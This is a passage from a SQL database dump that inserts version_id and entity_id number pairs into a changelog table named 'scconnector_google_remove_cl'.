(8516, 1049),
(8517, 1049),
(8518, 1050),
(8519, 1050),
(8520, 1050),
(8521, 1050),
(8522, 1050),
(8523, 1050),
(8524, 1051),
(8525, 1051),
(8526, 1051),
(8527, 1051),
(8528, 1051),
(8529, 1051),
(8530, 1052),
(8531, 1052),
(8532, 1052),
(8533, 1052),
(8534, 1052),
(8535, 1052),
(8536, 1053),
(8537, 1053),
(8538, 1053),
(8539, 1053),
(8540, 1053),
(8541, 1053),
(8542, 1054),
(8543, 1054),
(8544, 1054),
(8545, 1054),
(8546, 1054),
(8547, 1054),
(8548, 1055),
(8549, 1055),
(8550, 1055),
(8551, 1055),
(8552, 1055),
(8553, 1055),
(8554, 1056),
(8555, 1056),
(8556, 1056),
(8557, 1056),
(8558, 1056),
(8559, 1056),
(8560, 1057),
(8561, 1057),
(8562, 1057),
(8563, 1057),
(8564, 1057),
(8565, 1057),
(8566, 1057),
(8567, 1057),
(8568, 1057),
(8569, 1058),
(8570, 1058),
(8571, 1058),
(8572, 1058),
(8573, 1058),
(8574, 1058),
(8575, 1059),
(8576, 1059),
(8577, 1059),
(8578, 1059),
(8579, 1059),
(8580, 1059),
(8581, 1060),
(8582, 1061),
(8583, 1062),
(8584, 1063),
(8585, 1064),
(8586, 1065),
(8587, 1066),
(8588, 1067),
(8589, 1068),
(8590, 1069),
(8591, 1070),
(8592, 1071),
(8593, 1072),
(8594, 1073),
(8595, 1074),
(8596, 1075),
(8597, 1076),
(8598, 1077),
(8599, 1078),
(8600, 1079),
(8601, 1080),
(8602, 1081),
(8603, 1082),
(8604, 1083),
(8605, 1084),
(8606, 1085),
(8607, 1086),
(8608, 1087),
(8609, 1088),
(8610, 1089),
(8611, 1090),
(8612, 1091),
(8613, 1092),
(8614, 1093),
(8615, 1094),
(8616, 1095),
(8617, 1096),
(8618, 1097),
(8619, 1098),
(8620, 1099),
(8621, 1100),
(8622, 1101),
(8623, 1102),
(8624, 1103),
(8625, 1104),
(8626, 1105),
(8627, 1106),
(8628, 1107),
(8629, 1108),
(8630, 1109),
(8631, 1110),
(8632, 1111),
(8633, 1112),
(8634, 1113),
(8635, 1114),
(8636, 1115),
(8637, 1116),
(8638, 1117),
(8639, 1118),
(8640, 1119),
(8641, 1120),
(8642, 1121),
(8643, 1122),
(8644, 1123),
(8645, 1124),
(8646, 1125),
(8647, 1126),
(8648, 1127),
(8649, 1128),
(8650, 1129),
(8651, 1130),
(8652, 1131),
(8653, 1132),
(8654, 1133),
(8655, 1134),
(8656, 1135),
(8657, 1136),
(8658, 1137),
(8659, 1138),
(8660, 1139),
(8661, 1140),
(8662, 1141),
(8663, 1142),
(8664, 1143),
(8665, 1144),
(8666, 1145),
(8667, 1146),
(8668, 1147),
(8669, 1148),
(8670, 1149),
(8671, 1150),
(8672, 1151),
(8673, 1152),
(8674, 1153),
(8675, 1154),
(8676, 1155),
(8677, 1156),
(8678, 1157),
(8679, 1158),
(8680, 1159),
(8681, 1060),
(8682, 1061),
(8683, 1062),
(8684, 1063),
(8685, 1064),
(8686, 1065),
(8687, 1066),
(8688, 1067),
(8689, 1068),
(8690, 1069),
(8691, 1070),
(8692, 1071),
(8693, 1072),
(8694, 1073),
(8695, 1074),
(8696, 1075),
(8697, 1076),
(8698, 1077),
(8699, 1078),
(8700, 1079),
(8701, 1080),
(8702, 1081),
(8703, 1082),
(8704, 1083),
(8705, 1084),
(8706, 1085),
(8707, 1086),
(8708, 1087),
(8709, 1088),
(8710, 1089),
(8711, 1090),
(8712, 1091),
(8713, 1092),
(8714, 1093),
(8715, 1094),
(8716, 1095),
(8717, 1096),
(8718, 1097),
(8719, 1098),
(8720, 1099),
(8721, 1100),
(8722, 1101),
(8723, 1102),
(8724, 1103),
(8725, 1104),
(8726, 1105),
(8727, 1106),
(8728, 1107),
(8729, 1108),
(8730, 1109),
(8731, 1110),
(8732, 1111),
(8733, 1112),
(8734, 1113),
(8735, 1114),
(8736, 1115),
(8737, 1116),
(8738, 1117),
(8739, 1118),
(8740, 1119),
(8741, 1120),
(8742, 1121),
(8743, 1122),
(8744, 1123),
(8745, 1124),
(8746, 1125),
(8747, 1126),
(8748, 1127),
(8749, 1128),
(8750, 1129),
(8751, 1130),
(8752, 1131),
(8753, 1132),
(8754, 1133),
(8755, 1134),
(8756, 1135),
(8757, 1136),
(8758, 1137),
(8759, 1138),
(8760, 1139),
(8761, 1140),
(8762, 1141),
(8763, 1142),
(8764, 1143),
(8765, 1144),
(8766, 1145),
(8767, 1146),
(8768, 1147),
(8769, 1148),
(8770, 1149),
(8771, 1150),
(8772, 1151),
(8773, 1152),
(8774, 1153),
(8775, 1154),
(8776, 1155),
(8777, 1156),
(8778, 1157),
(8779, 1158),
(8780, 1159),
(8781, 1060),
(8782, 1060),
(8783, 1060),
(8784, 1060),
(8785, 1060),
(8786, 1060),
(8787, 1061),
(8788, 1061),
(8789, 1061),
(8790, 1061),
(8791, 1061),
(8792, 1061),
(8793, 1062),
(8794, 1062),
(8795, 1062),
(8796, 1062),
(8797, 1062),
(8798, 1062),
(8799, 1063),
(8800, 1063),
(8801, 1063),
(8802, 1063),
(8803, 1063),
(8804, 1063),
(8805, 1064),
(8806, 1064),
(8807, 1064),
(8808, 1064),
(8809, 1064),
(8810, 1064),
(8811, 1065),
(8812, 1065),
(8813, 1065),
(8814, 1065),
(8815, 1065),
(8816, 1065),
(8817, 1066),
(8818, 1066),
(8819, 1066),
(8820, 1066),
(8821, 1066),
(8822, 1066),
(8823, 1067),
(8824, 1067),
(8825, 1067),
(8826, 1067),
(8827, 1067),
(8828, 1067),
(8829, 1068),
(8830, 1068),
(8831, 1068),
(8832, 1068),
(8833, 1068),
(8834, 1068),
(8835, 1069),
(8836, 1069),
(8837, 1069),
(8838, 1069),
(8839, 1069),
(8840, 1069),
(8841, 1070),
(8842, 1070),
(8843, 1070),
(8844, 1070),
(8845, 1070),
(8846, 1070),
(8847, 1071),
(8848, 1071),
(8849, 1071),
(8850, 1071),
(8851, 1071),
(8852, 1071),
(8853, 1072),
(8854, 1072),
(8855, 1072),
(8856, 1072),
(8857, 1072),
(8858, 1072),
(8859, 1073),
(8860, 1073),
(8861, 1073),
(8862, 1073),
(8863, 1073),
(8864, 1073),
(8865, 1073),
(8866, 1073),
(8867, 1073),
(8868, 1074),
(8869, 1074),
(8870, 1074),
(8871, 1074),
(8872, 1074),
(8873, 1074),
(8874, 1075),
(8875, 1075),
(8876, 1075),
(8877, 1075),
(8878, 1075),
(8879, 1075),
(8880, 1076),
(8881, 1076),
(8882, 1076),
(8883, 1076),
(8884, 1076),
(8885, 1076),
(8886, 1077),
(8887, 1077),
(8888, 1077),
(8889, 1077),
(8890, 1077),
(8891, 1077),
(8892, 1078),
(8893, 1078),
(8894, 1078),
(8895, 1078),
(8896, 1078),
(8897, 1078),
(8898, 1079),
(8899, 1079),
(8900, 1079),
(8901, 1079),
(8902, 1079),
(8903, 1079),
(8904, 1080),
(8905, 1080),
(8906, 1080),
(8907, 1080),
(8908, 1080),
(8909, 1080),
(8910, 1081),
(8911, 1081),
(8912, 1081),
(8913, 1081),
(8914, 1081),
(8915, 1081),
(8916, 1082),
(8917, 1082),
(8918, 1082),
(8919, 1082),
(8920, 1082),
(8921, 1082),
(8922, 1083),
(8923, 1083),
(8924, 1083),
(8925, 1083),
(8926, 1083),
(8927, 1083),
(8928, 1084),
(8929, 1084),
(8930, 1084),
(8931, 1084),
(8932, 1084),
(8933, 1084),
(8934, 1085),
(8935, 1085),
(8936, 1085),
(8937, 1085),
(8938, 1085),
(8939, 1085),
(8940, 1086),
(8941, 1086),
(8942, 1086),
(8943, 1086),
(8944, 1086),
(8945, 1086),
(8946, 1087),
(8947, 1087),
(8948, 1087),
(8949, 1087),
(8950, 1087),
(8951, 1087),
(8952, 1088),
(8953, 1088),
(8954, 1088),
(8955, 1088),
(8956, 1088),
(8957, 1088),
(8958, 1089),
(8959, 1089),
(8960, 1089),
(8961, 1089),
(8962, 1089),
(8963, 1089),
(8964, 1089),
(8965, 1089),
(8966, 1089),
(8967, 1090),
(8968, 1090),
(8969, 1090),
(8970, 1090),
(8971, 1090),
(8972, 1090),
(8973, 1091),
(8974, 1091),
(8975, 1091),
(8976, 1091),
(8977, 1091),
(8978, 1091),
(8979, 1092),
(8980, 1092),
(8981, 1092),
(8982, 1092),
(8983, 1092),
(8984, 1092),
(8985, 1093),
(8986, 1093),
(8987, 1093),
(8988, 1093),
(8989, 1093),
(8990, 1093),
(8991, 1094),
(8992, 1094),
(8993, 1094),
(8994, 1094),
(8995, 1094),
(8996, 1094),
(8997, 1095),
(8998, 1095),
(8999, 1095),
(9000, 1095),
(9001, 1095),
(9002, 1095),
(9003, 1096),
(9004, 1096),
(9005, 1096),
(9006, 1096),
(9007, 1096),
(9008, 1096),
(9009, 1097),
(9010, 1097),
(9011, 1097),
(9012, 1097),
(9013, 1097),
(9014, 1097),
(9015, 1098),
(9016, 1098),
(9017, 1098),
(9018, 1098),
(9019, 1098),
(9020, 1098),
(9021, 1099),
(9022, 1099),
(9023, 1099),
(9024, 1099),
(9025, 1099),
(9026, 1099),
(9027, 1100),
(9028, 1100),
(9029, 1100),
(9030, 1100),
(9031, 1100),
(9032, 1100),
(9033, 1101),
(9034, 1101),
(9035, 1101),
(9036, 1101),
(9037, 1101),
(9038, 1101),
(9039, 1102),
(9040, 1102),
(9041, 1102),
(9042, 1102),
(9043, 1102),
(9044, 1102),
(9045, 1103),
(9046, 1103),
(9047, 1103),
(9048, 1103),
(9049, 1103),
(9050, 1103),
(9051, 1104),
(9052, 1104),
(9053, 1104),
(9054, 1104),
(9055, 1104),
(9056, 1104),
(9057, 1105),
(9058, 1105),
(9059, 1105),
(9060, 1105),
(9061, 1105),
(9062, 1105),
(9063, 1105),
(9064, 1105),
(9065, 1105),
(9066, 1106),
(9067, 1106),
(9068, 1106),
(9069, 1106),
(9070, 1106),
(9071, 1106),
(9072, 1107),
(9073, 1107),
(9074, 1107),
(9075, 1107),
(9076, 1107),
(9077, 1107),
(9078, 1108),
(9079, 1108),
(9080, 1108),
(9081, 1108),
(9082, 1108),
(9083, 1108),
(9084, 1109),
(9085, 1109),
(9086, 1109),
(9087, 1109),
(9088, 1109),
(9089, 1109),
(9090, 1110),
(9091, 1110),
(9092, 1110),
(9093, 1110),
(9094, 1110),
(9095, 1110),
(9096, 1111),
(9097, 1111),
(9098, 1111),
(9099, 1111),
(9100, 1111),
(9101, 1111),
(9102, 1112),
(9103, 1112),
(9104, 1112),
(9105, 1112),
(9106, 1112),
(9107, 1112),
(9108, 1113),
(9109, 1113),
(9110, 1113),
(9111, 1113),
(9112, 1113),
(9113, 1113),
(9114, 1114),
(9115, 1114),
(9116, 1114),
(9117, 1114),
(9118, 1114),
(9119, 1114),
(9120, 1115),
(9121, 1115),
(9122, 1115),
(9123, 1115),
(9124, 1115),
(9125, 1115),
(9126, 1116),
(9127, 1116),
(9128, 1116),
(9129, 1116),
(9130, 1116),
(9131, 1116),
(9132, 1117),
(9133, 1117),
(9134, 1117),
(9135, 1117),
(9136, 1117),
(9137, 1117),
(9138, 1118),
(9139, 1118),
(9140, 1118),
(9141, 1118),
(9142, 1118),
(9143, 1118),
(9144, 1119),
(9145, 1119),
(9146, 1119),
(9147, 1119),
(9148, 1119),
(9149, 1119),
(9150, 1120),
(9151, 1120),
(9152, 1120),
(9153, 1120),
(9154, 1120),
(9155, 1120),
(9156, 1121),
(9157, 1121);
INSERT INTO `scconnector_google_remove_cl` (`version_id`, `entity_id`) VALUES
(9158, 1121),
(9159, 1121),
(9160, 1121),
(9161, 1121),
(9162, 1121),
(9163, 1121),
(9164, 1121),
(9165, 1122),
(9166, 1122),
(9167, 1122),
(9168, 1122),
(9169, 1122),
(9170, 1122),
(9171, 1123),
(9172, 1123),
(9173, 1123),
(9174, 1123),
(9175, 1123),
(9176, 1123),
(9177, 1124),
(9178, 1124),
(9179, 1124),
(9180, 1124),
(9181, 1124),
(9182, 1124),
(9183, 1125),
(9184, 1125),
(9185, 1125),
(9186, 1125),
(9187, 1125),
(9188, 1125),
(9189, 1126),
(9190, 1126),
(9191, 1126),
(9192, 1126),
(9193, 1126),
(9194, 1126),
(9195, 1127),
(9196, 1127),
(9197, 1127),
(9198, 1127),
(9199, 1127),
(9200, 1127),
(9201, 1127),
(9202, 1127),
(9203, 1127),
(9204, 1128),
(9205, 1128),
(9206, 1128),
(9207, 1128),
(9208, 1128),
(9209, 1128),
(9210, 1129),
(9211, 1129),
(9212, 1129),
(9213, 1129),
(9214, 1129),
(9215, 1129),
(9216, 1130),
(9217, 1130),
(9218, 1130),
(9219, 1130),
(9220, 1130),
(9221, 1130),
(9222, 1131),
(9223, 1131),
(9224, 1131),
(9225, 1131),
(9226, 1131),
(9227, 1131),
(9228, 1132),
(9229, 1132),
(9230, 1132),
(9231, 1132),
(9232, 1132),
(9233, 1132),
(9234, 1133),
(9235, 1133),
(9236, 1133),
(9237, 1133),
(9238, 1133),
(9239, 1133),
(9240, 1134),
(9241, 1134),
(9242, 1134),
(9243, 1134),
(9244, 1134),
(9245, 1134),
(9246, 1135),
(9247, 1135),
(9248, 1135),
(9249, 1135),
(9250, 1135),
(9251, 1135),
(9252, 1136),
(9253, 1136),
(9254, 1136),
(9255, 1136),
(9256, 1136),
(9257, 1136),
(9258, 1137),
(9259, 1137),
(9260, 1137),
(9261, 1137),
(9262, 1137),
(9263, 1137),
(9264, 1138),
(9265, 1138),
(9266, 1138),
(9267, 1138),
(9268, 1138),
(9269, 1138),
(9270, 1139),
(9271, 1139),
(9272, 1139),
(9273, 1139),
(9274, 1139),
(9275, 1139),
(9276, 1140),
(9277, 1140),
(9278, 1140),
(9279, 1140),
(9280, 1140),
(9281, 1140),
(9282, 1141),
(9283, 1141),
(9284, 1141),
(9285, 1141),
(9286, 1141),
(9287, 1141),
(9288, 1142),
(9289, 1142),
(9290, 1142),
(9291, 1142),
(9292, 1142),
(9293, 1142),
(9294, 1143),
(9295, 1143),
(9296, 1143),
(9297, 1143),
(9298, 1143),
(9299, 1143),
(9300, 1143),
(9301, 1143),
(9302, 1143),
(9303, 1144),
(9304, 1144),
(9305, 1144),
(9306, 1144),
(9307, 1144),
(9308, 1144),
(9309, 1145),
(9310, 1145),
(9311, 1145),
(9312, 1145),
(9313, 1145),
(9314, 1145),
(9315, 1146),
(9316, 1146),
(9317, 1146),
(9318, 1146),
(9319, 1146),
(9320, 1146),
(9321, 1147),
(9322, 1147),
(9323, 1147),
(9324, 1147),
(9325, 1147),
(9326, 1147),
(9327, 1148),
(9328, 1148),
(9329, 1148),
(9330, 1148),
(9331, 1148),
(9332, 1148),
(9333, 1149),
(9334, 1149),
(9335, 1149),
(9336, 1149),
(9337, 1149),
(9338, 1149),
(9339, 1150),
(9340, 1150),
(9341, 1150),
(9342, 1150),
(9343, 1150),
(9344, 1150),
(9345, 1151),
(9346, 1151),
(9347, 1151),
(9348, 1151),
(9349, 1151),
(9350, 1151),
(9351, 1152),
(9352, 1152),
(9353, 1152),
(9354, 1152),
(9355, 1152),
(9356, 1152),
(9357, 1153),
(9358, 1153),
(9359, 1153),
(9360, 1153),
(9361, 1153),
(9362, 1153),
(9363, 1154),
(9364, 1154),
(9365, 1154),
(9366, 1154),
(9367, 1154),
(9368, 1154),
(9369, 1155),
(9370, 1155),
(9371, 1155),
(9372, 1155),
(9373, 1155),
(9374, 1155),
(9375, 1156),
(9376, 1156),
(9377, 1156),
(9378, 1156),
(9379, 1156),
(9380, 1156),
(9381, 1157),
(9382, 1157),
(9383, 1157),
(9384, 1157),
(9385, 1157),
(9386, 1157),
(9387, 1158),
(9388, 1158),
(9389, 1158),
(9390, 1158),
(9391, 1158),
(9392, 1158),
(9393, 1159),
(9394, 1159),
(9395, 1159),
(9396, 1159),
(9397, 1159),
(9398, 1159),
(9399, 1159),
(9400, 1159),
(9401, 1159),
(9402, 1160),
(9403, 1161),
(9404, 1162),
(9405, 1163),
(9406, 1164),
(9407, 1165),
(9408, 1166),
(9409, 1167),
(9410, 1168),
(9411, 1169),
(9412, 1170),
(9413, 1171),
(9414, 1172),
(9415, 1173),
(9416, 1174),
(9417, 1175),
(9418, 1176),
(9419, 1177),
(9420, 1178),
(9421, 1179),
(9422, 1180),
(9423, 1181),
(9424, 1182),
(9425, 1183),
(9426, 1184),
(9427, 1185),
(9428, 1186),
(9429, 1187),
(9430, 1188),
(9431, 1189),
(9432, 1190),
(9433, 1191),
(9434, 1192),
(9435, 1193),
(9436, 1194),
(9437, 1195),
(9438, 1196),
(9439, 1197),
(9440, 1198),
(9441, 1199),
(9442, 1200),
(9443, 1201),
(9444, 1202),
(9445, 1203),
(9446, 1204),
(9447, 1205),
(9448, 1206),
(9449, 1207),
(9450, 1208),
(9451, 1209),
(9452, 1210),
(9453, 1211),
(9454, 1212),
(9455, 1213),
(9456, 1214),
(9457, 1215),
(9458, 1216),
(9459, 1217),
(9460, 1218),
(9461, 1219),
(9462, 1220),
(9463, 1221),
(9464, 1222),
(9465, 1223),
(9466, 1224),
(9467, 1225),
(9468, 1226),
(9469, 1227),
(9470, 1228),
(9471, 1229),
(9472, 1230),
(9473, 1231),
(9474, 1232),
(9475, 1233),
(9476, 1234),
(9477, 1235),
(9478, 1236),
(9479, 1237),
(9480, 1238),
(9481, 1239),
(9482, 1240),
(9483, 1241),
(9484, 1242),
(9485, 1243),
(9486, 1244),
(9487, 1245),
(9488, 1246),
(9489, 1247),
(9490, 1248),
(9491, 1249),
(9492, 1250),
(9493, 1251),
(9494, 1252),
(9495, 1253),
(9496, 1254),
(9497, 1255),
(9498, 1256),
(9499, 1257),
(9500, 1258),
(9501, 1259),
(9502, 1160),
(9503, 1161),
(9504, 1162),
(9505, 1163),
(9506, 1164),
(9507, 1165),
(9508, 1166),
(9509, 1167),
(9510, 1168),
(9511, 1169),
(9512, 1170),
(9513, 1171),
(9514, 1172),
(9515, 1173),
(9516, 1174),
(9517, 1175),
(9518, 1176),
(9519, 1177),
(9520, 1178),
(9521, 1179),
(9522, 1180),
(9523, 1181),
(9524, 1182),
(9525, 1183),
(9526, 1184),
(9527, 1185),
(9528, 1186),
(9529, 1187),
(9530, 1188),
(9531, 1189),
(9532, 1190),
(9533, 1191),
(9534, 1192),
(9535, 1193),
(9536, 1194),
(9537, 1195),
(9538, 1196),
(9539, 1197),
(9540, 1198),
(9541, 1199),
(9542, 1200),
(9543, 1201),
(9544, 1202),
(9545, 1203),
(9546, 1204),
(9547, 1205),
(9548, 1206),
(9549, 1207),
(9550, 1208),
(9551, 1209),
(9552, 1210),
(9553, 1211),
(9554, 1212),
(9555, 1213),
(9556, 1214),
(9557, 1215),
(9558, 1216),
(9559, 1217),
(9560, 1218),
(9561, 1219),
(9562, 1220),
(9563, 1221),
(9564, 1222),
(9565, 1223),
(9566, 1224),
(9567, 1225),
(9568, 1226),
(9569, 1227),
(9570, 1228),
(9571, 1229),
(9572, 1230),
(9573, 1231),
(9574, 1232),
(9575, 1233),
(9576, 1234),
(9577, 1235),
(9578, 1236),
(9579, 1237),
(9580, 1238),
(9581, 1239),
(9582, 1240),
(9583, 1241),
(9584, 1242),
(9585, 1243),
(9586, 1244),
(9587, 1245),
(9588, 1246),
(9589, 1247),
(9590, 1248),
(9591, 1249),
(9592, 1250),
(9593, 1251),
(9594, 1252),
(9595, 1253),
(9596, 1254),
(9597, 1255),
(9598, 1256),
(9599, 1257),
(9600, 1258),
(9601, 1259),
(9602, 1160),
(9603, 1160),
(9604, 1160),
(9605, 1160),
(9606, 1160),
(9607, 1160),
(9608, 1161),
(9609, 1161),
(9610, 1161),
(9611, 1161),
(9612, 1161),
(9613, 1161),
(9614, 1162),
(9615, 1162),
(9616, 1162),
(9617, 1162),
(9618, 1162),
(9619, 1162),
(9620, 1163),
(9621, 1163),
(9622, 1163),
(9623, 1163),
(9624, 1163),
(9625, 1163),
(9626, 1164),
(9627, 1164),
(9628, 1164),
(9629, 1164),
(9630, 1164),
(9631, 1164),
(9632, 1165),
(9633, 1165),
(9634, 1165),
(9635, 1165),
(9636, 1165),
(9637, 1165),
(9638, 1166),
(9639, 1166),
(9640, 1166),
(9641, 1166),
(9642, 1166),
(9643, 1166),
(9644, 1167),
(9645, 1167),
(9646, 1167),
(9647, 1167),
(9648, 1167),
(9649, 1167),
(9650, 1168),
(9651, 1168),
(9652, 1168),
(9653, 1168),
(9654, 1168),
(9655, 1168),
(9656, 1169),
(9657, 1169),
(9658, 1169),
(9659, 1169),
(9660, 1169),
(9661, 1169),
(9662, 1170),
(9663, 1170),
(9664, 1170),
(9665, 1170),
(9666, 1170),
(9667, 1170),
(9668, 1171),
(9669, 1171),
(9670, 1171),
(9671, 1171),
(9672, 1171),
(9673, 1171),
(9674, 1172),
(9675, 1172),
(9676, 1172),
(9677, 1172),
(9678, 1172),
(9679, 1172),
(9680, 1173),
(9681, 1173),
(9682, 1173),
(9683, 1173),
(9684, 1173),
(9685, 1173),
(9686, 1174),
(9687, 1174),
(9688, 1174),
(9689, 1174),
(9690, 1174),
(9691, 1174),
(9692, 1175),
(9693, 1175),
(9694, 1175),
(9695, 1175),
(9696, 1175),
(9697, 1175),
(9698, 1175),
(9699, 1175),
(9700, 1175),
(9701, 1176),
(9702, 1176),
(9703, 1176),
(9704, 1176),
(9705, 1176),
(9706, 1176),
(9707, 1177),
(9708, 1177),
(9709, 1177),
(9710, 1177),
(9711, 1177),
(9712, 1177),
(9713, 1178),
(9714, 1178),
(9715, 1178),
(9716, 1178),
(9717, 1178),
(9718, 1178),
(9719, 1179),
(9720, 1179),
(9721, 1179),
(9722, 1179),
(9723, 1179),
(9724, 1179),
(9725, 1180),
(9726, 1180),
(9727, 1180),
(9728, 1180),
(9729, 1180),
(9730, 1180),
(9731, 1181),
(9732, 1181),
(9733, 1181),
(9734, 1181),
(9735, 1181),
(9736, 1181),
(9737, 1182),
(9738, 1182),
(9739, 1182),
(9740, 1182),
(9741, 1182),
(9742, 1182),
(9743, 1183),
(9744, 1183),
(9745, 1183),
(9746, 1183),
(9747, 1183),
(9748, 1183),
(9749, 1184),
(9750, 1184),
(9751, 1184),
(9752, 1184),
(9753, 1184),
(9754, 1184),
(9755, 1185),
(9756, 1185),
(9757, 1185),
(9758, 1185),
(9759, 1185),
(9760, 1185),
(9761, 1186),
(9762, 1186),
(9763, 1186),
(9764, 1186),
(9765, 1186),
(9766, 1186),
(9767, 1187),
(9768, 1187),
(9769, 1187),
(9770, 1187),
(9771, 1187),
(9772, 1187),
(9773, 1188),
(9774, 1188),
(9775, 1188),
(9776, 1188),
(9777, 1188),
(9778, 1188),
(9779, 1189),
(9780, 1189),
(9781, 1189),
(9782, 1189),
(9783, 1189),
(9784, 1189),
(9785, 1190),
(9786, 1190),
(9787, 1190),
(9788, 1190),
(9789, 1190),
(9790, 1190),
(9791, 1191),
(9792, 1191),
(9793, 1191),
(9794, 1191),
(9795, 1191),
(9796, 1191),
(9797, 1191),
(9798, 1191),
(9799, 1191),
(9800, 1192),
(9801, 1192),
(9802, 1192),
(9803, 1192),
(9804, 1192),
(9805, 1192),
(9806, 1193),
(9807, 1193),
(9808, 1193),
(9809, 1193),
(9810, 1193),
(9811, 1193),
(9812, 1194),
(9813, 1194),
(9814, 1194),
(9815, 1194),
(9816, 1194),
(9817, 1194),
(9818, 1195),
(9819, 1195),
(9820, 1195),
(9821, 1195),
(9822, 1195),
(9823, 1195),
(9824, 1196),
(9825, 1196),
(9826, 1196),
(9827, 1196),
(9828, 1196),
(9829, 1196),
(9830, 1197),
(9831, 1197),
(9832, 1197),
(9833, 1197),
(9834, 1197),
(9835, 1197),
(9836, 1198),
(9837, 1198),
(9838, 1198),
(9839, 1198),
(9840, 1198),
(9841, 1198),
(9842, 1199),
(9843, 1199),
(9844, 1199),
(9845, 1199),
(9846, 1199),
(9847, 1199),
(9848, 1200),
(9849, 1200),
(9850, 1200),
(9851, 1200),
(9852, 1200),
(9853, 1200),
(9854, 1201),
(9855, 1201),
(9856, 1201),
(9857, 1201),
(9858, 1201),
(9859, 1201),
(9860, 1202),
(9861, 1202),
(9862, 1202),
(9863, 1202),
(9864, 1202),
(9865, 1202),
(9866, 1203),
(9867, 1203),
(9868, 1203),
(9869, 1203),
(9870, 1203),
(9871, 1203),
(9872, 1204),
(9873, 1204),
(9874, 1204),
(9875, 1204),
(9876, 1204),
(9877, 1204),
(9878, 1205),
(9879, 1205),
(9880, 1205),
(9881, 1205),
(9882, 1205),
(9883, 1205),
(9884, 1206),
(9885, 1206),
(9886, 1206),
(9887, 1206),
(9888, 1206),
(9889, 1206),
(9890, 1207),
(9891, 1207),
(9892, 1207),
(9893, 1207),
(9894, 1207),
(9895, 1207),
(9896, 1207),
(9897, 1207),
(9898, 1207),
(9899, 1208),
(9900, 1208),
(9901, 1208),
(9902, 1208),
(9903, 1208),
(9904, 1208),
(9905, 1209),
(9906, 1209),
(9907, 1209),
(9908, 1209),
(9909, 1209),
(9910, 1209),
(9911, 1210),
(9912, 1210),
(9913, 1210),
(9914, 1210),
(9915, 1210),
(9916, 1210),
(9917, 1211),
(9918, 1211),
(9919, 1211),
(9920, 1211),
(9921, 1211),
(9922, 1211),
(9923, 1212),
(9924, 1212),
(9925, 1212),
(9926, 1212),
(9927, 1212),
(9928, 1212),
(9929, 1213),
(9930, 1213),
(9931, 1213),
(9932, 1213),
(9933, 1213),
(9934, 1213),
(9935, 1214),
(9936, 1214),
(9937, 1214),
(9938, 1214),
(9939, 1214),
(9940, 1214),
(9941, 1215),
(9942, 1215),
(9943, 1215),
(9944, 1215),
(9945, 1215),
(9946, 1215),
(9947, 1216),
(9948, 1216),
(9949, 1216),
(9950, 1216),
(9951, 1216),
(9952, 1216),
(9953, 1217),
(9954, 1217),
(9955, 1217),
(9956, 1217),
(9957, 1217),
(9958, 1217),
(9959, 1218),
(9960, 1218),
(9961, 1218),
(9962, 1218),
(9963, 1218),
(9964, 1218),
(9965, 1219),
(9966, 1219),
(9967, 1219),
(9968, 1219),
(9969, 1219),
(9970, 1219),
(9971, 1220),
(9972, 1220),
(9973, 1220),
(9974, 1220),
(9975, 1220),
(9976, 1220),
(9977, 1221),
(9978, 1221),
(9979, 1221),
(9980, 1221),
(9981, 1221),
(9982, 1221),
(9983, 1222),
(9984, 1222),
(9985, 1222),
(9986, 1222),
(9987, 1222),
(9988, 1222),
(9989, 1223),
(9990, 1223),
(9991, 1223),
(9992, 1223),
(9993, 1223),
(9994, 1223),
(9995, 1223),
(9996, 1223),
(9997, 1223),
(9998, 1224),
(9999, 1224),
(10000, 1224),
(10001, 1224),
(10002, 1224),
(10003, 1224),
(10004, 1225),
(10005, 1225),
(10006, 1225),
(10007, 1225),
(10008, 1225),
(10009, 1225),
(10010, 1226),
(10011, 1226),
(10012, 1226),
(10013, 1226),
(10014, 1226),
(10015, 1226),
(10016, 1227),
(10017, 1227),
(10018, 1227),
(10019, 1227),
(10020, 1227),
(10021, 1227),
(10022, 1228),
(10023, 1228),
(10024, 1228),
(10025, 1228),
(10026, 1228),
(10027, 1228),
(10028, 1229),
(10029, 1229),
(10030, 1229),
(10031, 1229),
(10032, 1229),
(10033, 1229),
(10034, 1230),
(10035, 1230),
(10036, 1230),
(10037, 1230),
(10038, 1230),
(10039, 1230),
(10040, 1231),
(10041, 1231),
(10042, 1231),
(10043, 1231),
(10044, 1231),
(10045, 1231),
(10046, 1232),
(10047, 1232),
(10048, 1232),
(10049, 1232),
(10050, 1232),
(10051, 1232),
(10052, 1233),
(10053, 1233),
(10054, 1233),
(10055, 1233),
(10056, 1233),
(10057, 1233),
(10058, 1233),
(10059, 1233),
(10060, 1233),
(10061, 1234),
(10062, 1234),
(10063, 1234),
(10064, 1234),
(10065, 1234),
(10066, 1234),
(10067, 1235),
(10068, 1235),
(10069, 1235),
(10070, 1235),
(10071, 1235),
(10072, 1235),
(10073, 1236),
(10074, 1236),
(10075, 1236),
(10076, 1236),
(10077, 1236),
(10078, 1236),
(10079, 1237),
(10080, 1237),
(10081, 1237),
(10082, 1237),
(10083, 1237),
(10084, 1237),
(10085, 1238),
(10086, 1238),
(10087, 1238),
(10088, 1238),
(10089, 1238),
(10090, 1238),
(10091, 1239),
(10092, 1239),
(10093, 1239),
(10094, 1239),
(10095, 1239),
(10096, 1239),
(10097, 1240),
(10098, 1240),
(10099, 1240),
(10100, 1240),
(10101, 1240),
(10102, 1240),
(10103, 1241),
(10104, 1241),
(10105, 1241),
(10106, 1241),
(10107, 1241),
(10108, 1241),
(10109, 1242),
(10110, 1242),
(10111, 1242),
(10112, 1242),
(10113, 1242),
(10114, 1242),
(10115, 1243),
(10116, 1243),
(10117, 1243),
(10118, 1243),
(10119, 1243),
(10120, 1243),
(10121, 1244),
(10122, 1244),
(10123, 1244),
(10124, 1244),
(10125, 1244),
(10126, 1244),
(10127, 1245),
(10128, 1245),
(10129, 1245),
(10130, 1245),
(10131, 1245),
(10132, 1245),
(10133, 1246),
(10134, 1246),
(10135, 1246),
(10136, 1246),
(10137, 1246),
(10138, 1246),
(10139, 1247),
(10140, 1247),
(10141, 1247),
(10142, 1247),
(10143, 1247),
(10144, 1247),
(10145, 1248),
(10146, 1248),
(10147, 1248),
(10148, 1248),
(10149, 1248),
(10150, 1248),
(10151, 1249),
(10152, 1249),
(10153, 1249),
(10154, 1249),
(10155, 1249),
(10156, 1249),
(10157, 1249),
(10158, 1249),
(10159, 1249),
(10160, 1250),
(10161, 1250),
(10162, 1250),
(10163, 1250),
(10164, 1250),
(10165, 1250),
(10166, 1251),
(10167, 1251),
(10168, 1251),
(10169, 1251),
(10170, 1251),
(10171, 1251),
(10172, 1252),
(10173, 1252),
(10174, 1252),
(10175, 1252),
(10176, 1252),
(10177, 1252),
